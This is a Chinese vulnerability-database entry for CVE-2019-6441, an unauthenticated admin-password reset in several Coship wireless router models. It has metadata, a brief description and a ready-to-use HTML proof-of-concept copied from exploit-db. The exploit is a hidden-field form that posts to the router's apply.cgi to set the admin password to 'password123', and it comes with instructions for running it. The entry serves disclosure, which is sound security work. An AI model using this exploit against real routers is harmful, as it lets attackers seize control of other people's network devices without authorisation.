Coship Wireless Router 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1451446 漏洞类型
发布时间 2019-01-17 更新时间 2019-01-17
CVE编号 CVE-2019-6441 CNNVD-ID CNNVD-201901-726
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019010177
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201901-726
|漏洞详情
Coship Wireless Router是中国同洲(Coship)电子公司的一款无线路由器。 Coship Wireless Router中存在安全漏洞。攻击者可该漏洞重置管理员密码。以下版本受到影响:Coship Wireless Router 4.0.0.48版本,4.0.0.40版本,5.0.0.54版本,5.0.0.55版本,10.0.0.49版本。
|漏洞EXP
<!--
# Exploit Title: Coship Wireless Router a Unauthenticated Admin Password Reset
# Date: 15.01.2019
# Exploit Author: Adithyan AK
# Vendor Homepage: http://en.coship.com/
# Category: Hardware (Wifi Router)
# Affected Versions : Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49.
# Tested on: MacOS Mojave v.10.14
# CVE: CVE-2019-6441

# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html
# Open Exploit.html with your Browser
# Click on aSubmit requesta
# Password of the admin will now be changed as "password123"

# PoC :
-->

<html>
  <!-- Change the X.X.X.X with the router's IP address -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://X.X.X.X/apply.cgi" method="POST">
      <input type="hidden" name="page" value="regx/management/accounts.asp" />
      <input type="hidden" name="http_username" value="admin" />
      <input type="hidden" name="http_passwd" value="password123" />
      <input type="hidden" name="usr_confirm_password" value="password123" />
      <input type="hidden" name="action" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
|参考资料

来源:www.exploit-db.com

链接:https://www.exploit-db.com/exploits/46180